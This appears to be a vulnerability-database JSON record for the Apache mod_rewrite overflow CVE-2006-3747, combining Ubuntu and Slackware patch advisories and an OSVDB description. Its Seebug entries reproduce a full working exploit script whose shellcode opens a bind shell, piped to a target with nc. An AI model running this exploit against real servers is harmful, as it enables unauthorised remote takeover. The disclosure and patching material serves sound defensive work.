Size/MD5: 489468 a4bf30924bedcd2c08254294e32877fc\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 261268 e4645315c2f1ea2cfda97220513c3129\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 131698 
f7cab6c91b232acd83a711d0cb8dce4b\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 916034 11f263805524e1485c87436981f4a0ff\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 8951098 9696192a5d27810ef15d8adac8a998e1\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 523778 8b04ab792246c49a9f6396a050a51a17\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 513608 802726ffd0f1608fe5368cc01380636f\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 858972 127e8eaf484042684f6333e13eec5364\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 219670 666bbf96509154d2733eac8bf420ad42\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 215272 bc9bdc143359a2cd379e6d92b603695f\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 219192 1fb310e239bdc4eb50c402481424c109\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 170938 21604d1e84accd9d391a8ffa9270814b\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 171708 74cedc7b0b07a705ebf86cdfca83be39\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 103484 e1c6572ce8ca8b87e3d02d6e10811d0b\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 35756 63150684c36485680f904bff7f0f33dd\r\n 
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 404376 f0b7221c76c25c23000c89b98748182b\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 492342 a39edb0bf286a1ad00fbdad7b0b34a87\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 280794 9b3f787e252992a4cfc8701834c8e264\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 140906 e46af1711b11881f6fced5dcbdc4ded4\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_sparc.deb\r\n Size/MD5: 848164 bf16bc264a7cb4fb4b00589ce876fbf3\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_sparc.deb\r\n Size/MD5: 8789014 7491e60fc947bea209b716d6809fb471\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_sparc.deb\r\n Size/MD5: 510756 a56f486883acab1b8307dee15c33269a\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_sparc.deb\r\n Size/MD5: 495232 f062b6639709aebe320e85074c412de4\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 803312 9630ce33d497294b2e18354c372c88d0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 209738 4a12d7e0ade0e0fbb3467ebaafa801fb\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 205418 730a1dad472f64e718abb6c535236818\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 209156 c522212e4be0ee05ce0a4805fce399c7\r\n 
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 170934 4c37d5218adb9a78fd4ac2adc833f6d6\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 171720 804531314e706f5552bf60b491c3126b\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 92830 9ca8aec605259f6690d368817e0441eb\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 35760 bc262d6c6a7b328586ec5eeb53e6fd20\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_sparc.deb\r\n Size/MD5: 391024 1b74b327a8fc46a0c63e7555e754985c\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_sparc.deb\r\n Size/MD5: 490954 4f3aab50fb9e1dca25e32be5fd441a3a\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 267372 ffd9172cd880a823248d5e31f0dc38f0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 129612 b6389c465ec05e8697b3ea4370014a04\r\n", "edition": 1, "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "SECURITYVULNS:DOC:13661", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13661", "title": "[Full-disclosure] [USN-328-1] Apache vulnerability", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Apache HTTP Server's 'mod_rewrite' module when using LDAP scheme handling and specific rules (see technical desc). 
The Apache Server fails to check input boundaries resulting in an off-by-one overflow. With a specially crafted request, an attacker can cause a denial of service or possibly execute arbitrary code resulting in a loss of integrity and/or availability.\n## Technical Description\nSome RewriteRules, specifically those where the remote user can influence the beginning of a rewritten URL and that do not include any of the following flags: Forbidden (F), Gone (G), or NoEscape (NE), could expose the vulnerability.\n\nFor example, this type of rule is vulnerable:\nRewriteRule fred/(.*) $1\nWhile this one is not:\nRewriteRule fred/(.*) joe/$1\n## Solution Description\nUpgrade to version 1.3.37, 2.0.59, 2.2.3 or higher, as it has been reported to fix this vulnerability. Alternatively, users can disable the mod_rewrite engine (by setting \"RewriteEngine off\") as a workaround.\n## Short Description\nA remote overflow exists in Apache HTTP Server's 'mod_rewrite' module when using LDAP scheme handling and specific rules (see technical desc). The Apache Server fails to check input boundaries resulting in an off-by-one overflow. 
With a specially crafted request, an attacker can cause a denial of service or possibly execute arbitrary code resulting in a loss of integrity and/or availability.\n## References:\nVendor Specific News/Changelog Entry: http://www.apache.org/dist/httpd/Announcement2.2.html\nVendor Specific News/Changelog Entry: http://www.apache.org/dist/httpd/Announcement1.3.html\nVendor Specific News/Changelog Entry: http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3117\nVendor Specific News/Changelog Entry: http://www-1.ibm.com/support/docview.wss?uid=swg27007951\nVendor Specific News/Changelog Entry: http://www.apache.org/dist/httpd/Announcement2.0.html\n[Vendor Specific Advisory URL](http://www.openbsd.org/errata.html#httpd)\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-328-1)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg1PK29154)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:133)\n[Vendor Specific Advisory URL](https://issues.rpath.com/browse/RPL-538)\n[Vendor Specific Advisory URL](http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.610131)\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0044/)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg24013080)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-102662-1)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=c00797078)\n[Vendor Specific Advisory URL](http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE)\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2006_43_apache.html)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg1PK29156)\n[Vendor Specific Advisory 
URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-102663-1)\n[Secunia Advisory ID:21273](https://secuniaresearch.flexerasoftware.com/advisories/21273/)\n[Secunia Advisory ID:21478](https://secuniaresearch.flexerasoftware.com/advisories/21478/)\n[Secunia Advisory ID:22262](https://secuniaresearch.flexerasoftware.com/advisories/22262/)\n[Secunia Advisory ID:22388](https://secuniaresearch.flexerasoftware.com/advisories/22388/)\n[Secunia Advisory ID:22523](https://secuniaresearch.flexerasoftware.com/advisories/22523/)\n[Secunia Advisory ID:21197](https://secuniaresearch.flexerasoftware.com/advisories/21197/)\n[Secunia Advisory ID:21247](https://secuniaresearch.flexerasoftware.com/advisories/21247/)\n[Secunia Advisory ID:21315](https://secuniaresearch.flexerasoftware.com/advisories/21315/)\n[Secunia Advisory ID:21284](https://secuniaresearch.flexerasoftware.com/advisories/21284/)\n[Secunia Advisory ID:21313](https://secuniaresearch.flexerasoftware.com/advisories/21313/)\n[Secunia Advisory ID:21346](https://secuniaresearch.flexerasoftware.com/advisories/21346/)\n[Secunia Advisory ID:26329](https://secuniaresearch.flexerasoftware.com/advisories/26329/)\n[Secunia Advisory ID:21241](https://secuniaresearch.flexerasoftware.com/advisories/21241/)\n[Secunia Advisory ID:21245](https://secuniaresearch.flexerasoftware.com/advisories/21245/)\n[Secunia Advisory ID:21307](https://secuniaresearch.flexerasoftware.com/advisories/21307/)\n[Secunia Advisory ID:21266](https://secuniaresearch.flexerasoftware.com/advisories/21266/)\n[Secunia Advisory ID:21509](https://secuniaresearch.flexerasoftware.com/advisories/21509/)\n[Secunia Advisory ID:22368](https://secuniaresearch.flexerasoftware.com/advisories/22368/)\n[Secunia Advisory ID:22669](https://secuniaresearch.flexerasoftware.com/advisories/22669/)\n[Secunia Advisory ID:23260](https://secuniaresearch.flexerasoftware.com/advisories/23260/)\nOther Advisory URL: 
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01118771\nOther Advisory URL: http://www.apache.org/dist/httpd/Announcement1.3.html\nOther Advisory URL: http://www.niscc.gov.uk/niscc/docs/al-20060728-00515.html?lang=en\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200608-01.xml\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1132\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1131\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0398.html\nMail List Post: http://attrition.org/pipermail/vim/2006-November/001125.html\nMail List Post: http://attrition.org/pipermail/vim/2006-November/001126.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0089.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0674.html\nKeyword: HPSBMA02250,SSRT061275\nKeyword: HPSBUX02172,SSRT061269\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2237\n[CVE-2006-3747](https://vulners.com/cve/CVE-2006-3747)\nCERT VU: 395412\n", "modified": "2006-07-28T06:04:20", "published": "2006-07-28T06:04:20", "href": "https://vulners.com/osvdb/OSVDB:27588", "id": "OSVDB:27588", "title": "Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow", "type": "osvdb", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T22:28:10", "description": "No description provided by source.", "published": "2006-08-21T00:00:00", "title": "Apache < 1.3.37\t 2.0.59\t 2.2.3 (mod_rewrite) Remote Overflow PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-16391", "id": "SSV:16391", "sourceData": "\n #!/bin/sh\n# Exploit for Apache mod_rewrite off-by-one.\n# Vulnerability discovered by Mark 
Dowd.\n# CVE-2006-3747\n# \n# by jack <jack\\x40gulcas\\x2Eorg>\n# 2006-08-20\n#\n# Thx to xuso for help me with the shellcode.\n#\n# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not\n# you must recalculate adressess.\n#\n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified\n# for avoiding apache url-escape.. Take a look is quite nice ;)\n#\n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at\n# 0x0834ae77 for any other version/system find it.\n#\n# Gulcas rulez :P\n\necho -e "mod_rewrite apache off-by-one overflow"\necho "by jack <jack\\x40gulcas\\x2eorg>\\n\\n"\n\nif [ $# -ne 1 ] ; then\n echo "Usage: $0 webserver"\n exit\nfi\n\nhost=$1\n\necho -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\\\n%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\\n%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\\n%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\\n%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\\n%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\\n%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\\n%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\\n%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\\n%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\\nHost: $host\\r\\n\\r\\n" | nc $host 80\n\n# milw0rm.com [2006-08-21]\n\n ", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-16391"}, {"lastseen": "2017-11-19T22:06:14", "description": "No description provided by source.", "published": "2007-04-10T00:00:00", "type": "seebug", "title": "Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-04-10T00:00:00", "href": 
"https://www.seebug.org/vuldb/ssvid-6610", "id": "SSV:6610", "sourceData": "\n #!/bin/sh\r\n#\u00a0Exploit\u00a0for\u00a0Apache\u00a0mod_rewrite\u00a0off-by-one(Win32).\r\n#\r\n#\u00a0by\u00a0axis\u00a0<axis@ph4nt0m>\r\n#\u00a0http://www.ph4nt0m.org\r\n#\u00a02007-04-06\r\n#\r\n#\u00a0Tested\u00a0on\u00a0Apache\u00a02.0.58\u00a0(Win32)\r\n#\u00a0Windows2003\u00a0CN\u00a0SP1\r\n#\r\n#\u00a0Vulnerable\u00a0Apache\u00a0Versions:\r\n#\u00a0*\u00a01.3\u00a0branch:\u00a0>1.3.28\u00a0and\u00a0<1.3.37\r\n#\u00a0*\u00a02.0\u00a0branch:\u00a0>2.0.46\u00a0and\u00a0<2.0.59\r\n#\u00a0*\u00a02.2\u00a0branch:\u00a0>2.2.0\u00a0and\u00a0<2.2.3\r\n#\r\n#\r\n#\u00a0Vulnerability\u00a0discovered\u00a0by\u00a0Mark\u00a0Dowd.\r\n#\u00a0CVE-2006-3747\r\n#\u00a0\r\n#\u00a0first\u00a0POC\u00a0by\u00a0jack\u00a0<jackx40gulcasx2Eorg>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-6610", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:29:05", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-63874", "id": "SSV:63874", "sourceData": "\n #!/bin/sh\r\n# Exploit for Apache mod_rewrite off-by-one.\r\n# Vulnerability discovered by Mark Dowd.\r\n# CVE-2006-3747\r\n# \r\n# by jack <jack\\x40gulcas\\x2Eorg>\r\n# 2006-08-20\r\n#\r\n# Thx to xuso for help me with the shellcode.\r\n#\r\n# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not\r\n# you must recalculate adressess.\r\n#\r\n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified\r\n# for avoiding apache url-escape.. 
Take a look is quite nice ;)\r\n#\r\n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at\r\n# 0x0834ae77 for any other version/system find it.\r\n#\r\n# Gulcas rulez :P\r\n\r\necho -e "mod_rewrite apache off-by-one overflow"\r\necho "by jack <jack\\x40gulcas\\x2eorg>\\n\\n"\r\n\r\nif [ $# -ne 1 ] ; then\r\n echo "Usage: $0 webserver"\r\n exit\r\nfi\r\n\r\nhost=$1\r\n\r\necho -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\\\r\n%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\\r\n%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\\r\n%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\\r\n%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\\r\n%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\\r\n%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\\r\n%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\\r\n%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\\r\n%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\\r\nHost: $host\\r\\n\\r\\n" | nc $host 80\r\n\r\n# milw0rm.com [2006-08-21]\r\n\n ", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-63874"}, {"lastseen": "2017-11-19T22:22:19", "description": "Apache\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801WEB\u670d\u52a1\u7a0b\u5e8f\u3002\r\n\r\nApache\u7684mod_rewrite\u6a21\u5757\u5728\u8f6c\u4e49\u7edd\u5bf9URI\u4e3b\u9898\u65f6\u5b58\u5728\u5355\u5b57\u8282\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u5728\u670d\u52a1\u5668\u4e0a\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\nmod_rewrite\u6a21\u5757\u7684escape_absolute_uri()\u51fd\u6570\u5206\u79bbLDAP 
URL\u4e2d\u7684\u4ee4\u724c\u65f6\uff0c\u4f1a\u5bfc\u81f4\u5728\u5b57\u7b26\u6307\u9488\u6570\u7ec4\u4ee5\u5916\u5199\u5165\u6307\u5411\u7528\u6237\u63a7\u5236\u6570\u636e\u7684\u6307\u9488\uff0c\u8fd9\u6837\u5c31\u53ef\u80fd\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u4e3b\u673a\u3002\n\nApache Group Apache 2.2.x >= 2.2.0\r\nApache Group Apache 2.0.x >= 2.0.46\r\nApache Group Apache 1.3.x >= 1.3.28\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u7528Apache\u7684mod_rewrite\u6a21\u5757\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache Group\r\n------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://httpd.apache.org/download.cgi\" target=\"_blank\">http://httpd.apache.org/download.cgi</a>\r\n\r\nDebian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\uff08DSA-1132-1, DSA-1131-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1132-1\uff1aNew apache2 packages fix buffer overflow\r\n\u94fe\u63a5\uff1a<a href=\"http://www.debian.org/security/2005/dsa-1132\" target=\"_blank\">http://www.debian.org/security/2005/dsa-1132</a>\r\n\r\nDSA-1131-1\uff1aNew apache package fix buffer overflow\r\n\u94fe\u63a5\uff1a<a href=\"http://www.debian.org/security/2005/dsa-1131\" target=\"_blank\">http://www.debian.org/security/2005/dsa-1131</a>\r\n\r\nGentoo\r\n------\r\nGentoo\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08GLSA-200608-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nGLSA-200608-01\uff1aApache: Off-by-one flaw in mod_rewrite\r\n\u94fe\u63a5\uff1a<a href=\"http://security.gentoo.org/glsa/glsa-200608-01.xml\" target=\"_blank\">http://security.gentoo.org/glsa/glsa-200608-01.xml</a>\r\n\r\n\u6240\u6709Apache\u7528\u6237\u90fd\u5e94\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\uff1a\r\n\r\n # emerge 
--sync\r\n # emerge --ask --oneshot --verbose net-www/apache", "published": "2006-11-05T00:00:00", "type": "seebug", "title": "Apache mod_rewrite\u6a21\u5757\u5355\u5b57\u8282\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2006-11-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-429", "id": "SSV:429", "sourceData": "\n #!/bin/sh\r\n# Exploit for Apache mod_rewrite off-by-one.\r\n# Vulnerability discovered by Mark Dowd.\r\n# CVE-2006-3747\r\n#\r\n# by jack <jack\\x40gulcas\\x2Eorg>\r\n# 2006-08-20\r\n#\r\n# Thx to xuso for help me\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-429", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2020-10-25T16:36:07", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix a security issue with mod_rewrite.\n\nMore details about the issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747\n\nIn addition, new mod_ssl packages for Apache 1.3.37 are available for\nall of these versions of Slackware. This additional package does not\nfix a security issue, but may be required on your system depending on\nyour Apache setup.\n\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/apache-1.3.37-i486-1_slack10.2.tgz:\n Upgraded to apache-1.3.37.\n From the announcement on httpd.apache.org:\n This version of Apache is security fix release only. 
An off-by-one flaw\n exists in the Rewrite module, mod_rewrite, as shipped with Apache 1.3\n since 1.3.28, 2.0 since 2.0.46, and 2.2 since 2.2.0.\n The Slackware Security Team feels that the vast majority of installations\n will not be configured in a vulnerable way but still suggests upgrading to\n the new apache and mod_ssl packages for maximum security.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747\n And see Apache's announcement here:\n http://www.apache.org/dist/httpd/Announcement1.3.html\n (* Security fix *)\npatches/packages/mod_ssl-2.8.28_1.3.37-i486-1_slack10.2.tgz:\n Upgraded to mod_ssl-2.8.28-1.3.37.\n\nWhere to find the new packages:\n\nUpdated packages for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/apache-1.3.37-i386-1_slack8.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/mod_ssl-2.8.28_1.3.37-i386-1_slack8.1.tgz\n\nUpdated packages for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/apache-1.3.37-i386-1_slack9.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/mod_ssl-2.8.28_1.3.37-i386-1_slack9.0.tgz\n\nUpdated packages for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/apache-1.3.37-i486-1_slack9.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/mod_ssl-2.8.28_1.3.37-i486-1_slack9.1.tgz\n\nUpdated packages for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/apache-1.3.37-i486-1_slack10.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/mod_ssl-2.8.28_1.3.37-i486-1_slack10.0.tgz\n\nUpdated packages for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/apache-1.3.37-i486-1_slack10.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/mod_ssl-2.8.28_1.3.37-i486-1_slack10.1.tgz\n\nUpdated packages 
for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/apache-1.3.37-i486-1_slack10.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/mod_ssl-2.8.28_1.3.37-i486-1_slack10.2.tgz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/apache-1.3.37-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/mod_ssl-2.8.28_1.3.37-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 packages:\n55d47a6b97a9d7a22c7a763516efcea8 apache-1.3.37-i386-1_slack8.1.tgz\n1368c7ae40208b163f3206f3e22048ff mod_ssl-2.8.28_1.3.37-i386-1_slack8.1.tgz\n\nSlackware 9.0 packages:\n99ce9375d240afd31b9106adec400815 apache-1.3.37-i386-1_slack9.0.tgz\n5a61caaf9f4165212907e6a296356c43 mod_ssl-2.8.28_1.3.37-i386-1_slack9.0.tgz\n\nSlackware 9.1 packages:\n25a4d00152a314a0725d911042e96401 apache-1.3.37-i486-1_slack9.1.tgz\n7cc5b41158adf19a069897add2700afa mod_ssl-2.8.28_1.3.37-i486-1_slack9.1.tgz\n\nSlackware 10.0 packages:\n84542fd4e9b31a5607810ccf4a37a103 